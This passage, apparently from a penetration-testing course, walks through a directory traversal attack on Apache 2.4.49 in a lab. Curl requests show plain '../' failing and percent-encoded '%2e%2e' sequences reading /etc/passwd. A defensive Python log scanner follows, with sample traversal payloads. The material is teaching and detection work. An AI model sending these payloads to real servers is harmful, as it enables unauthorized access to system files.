Having explored directory traversal concepts in depth with the Mountain Desserts web application, let's now apply these skills to a real vulnerability. In the Vulnerability Scanning Module we scanned the SAMBA machine and identified a directory traversal vulnerability in Apache 2.4.49. This vulnerability can be exploited by using a relative path after specifying the cgi-bin directory in the URL.

Let's use curl and several ../ sequences to exploit this directory traversal vulnerability in Apache 2.4.49 on the WEB18 machine.

kali@kali:/var/www/html$ curl http://192.168.50.16/cgi-bin/../../../../etc/passwd

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>

kali@kali:/var/www/html$ curl http://192.168.50.16/cgi-bin/../../../../../../../../../../etc/passwd

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>

Listing 11 - Using "../" to exploit the directory traversal vulnerability in Apache 2.4.49

As shown in Listing 11, after trying two requests with different numbers of ../ sequences, we could not display the contents of /etc/passwd via directory traversal. Because the ../ sequence is a well-known way of abusing web application behaviour, it is often filtered by the web server, by web application firewalls, or by the web application itself.

Fortunately, we can use URL Encoding (also called Percent Encoding) to bypass these filters. We can use dedicated ASCII encoding tables to encode our request from Listing 11 by hand, or use the online converter on the same page. For now we will only encode the dots, which are represented as "%2e".

kali@kali:/var/www/html$ curl http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
alfred:x:1000:1000::/home/alfred:/bin/bash

Listing 12 - Using encoded dots for directory traversal

Using encoded dots, we successfully displayed the contents of /etc/passwd on the target machine via directory traversal.

In general, URL encoding is used to convert the characters of a web request into a format that can be transmitted over the Internet. However, the technique is also popular for malicious purposes. The reason is that the encoded form of the characters in a request may be let through by filters that only check for the plain-text form, for example ../ but not %2e%2e/. Once the request has passed the filter, the web application or server interprets the encoded characters as the actual request.
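The filter weakness described above, from the defender's side, as an added example that is not part of the course material: a naive check that only looks for a literal "../" beside a hardened check that fully percent-decodes the path before looking for a ".." segment, both run over constructed Apache access-log lines modelled on the requests in Listings 11 and 12 (the log lines, status codes and the `scan_access_log` helper are constructed for this example).

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (combined format) modelled on Listings 11 and 12;
# the client address and status codes are illustrative, not captured data.
SAMPLE_LOG = """\
192.168.50.5 - - [10/Oct/2021:12:00:01 +0000] "GET /cgi-bin/../../../../etc/passwd HTTP/1.1" 404 196
192.168.50.5 - - [10/Oct/2021:12:00:02 +0000] "GET /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1327
192.168.50.5 - - [10/Oct/2021:12:00:03 +0000] "GET /cgi-bin/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 196
192.168.50.5 - - [10/Oct/2021:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 10918
"""

# Pulls the request path out of a combined-format log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def percent_decode_fully(path: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing, so that double-encoded
    sequences such as %252e (-> %2e -> .) are also reduced to plain text."""
    decoded = path
    for _ in range(max_rounds):
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    return decoded


def naive_filter_blocks(path: str) -> bool:
    """The kind of check the requests in Listing 11 ran into: only a literal '../'
    is rejected, so '%2e%2e/' passes straight through."""
    return "../" in path


def hardened_filter_blocks(path: str) -> bool:
    """Decode first, then reject any path that still carries a '..' segment."""
    return ".." in percent_decode_fully(path).split("/")


def scan_access_log(log_text: str) -> list[tuple[str, str]]:
    """Return (raw path, decoded path) for every request the hardened check flags,
    so an analyst sees the path the server actually resolved, not the encoded form."""
    flagged = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match and hardened_filter_blocks(match.group(1)):
            flagged.append((match.group(1), percent_decode_fully(match.group(1))))
    return flagged


if __name__ == "__main__":
    for raw, decoded in scan_access_log(SAMPLE_LOG):
        print(f"{raw} -> {decoded} (naive filter blocks: {naive_filter_blocks(raw)})")
```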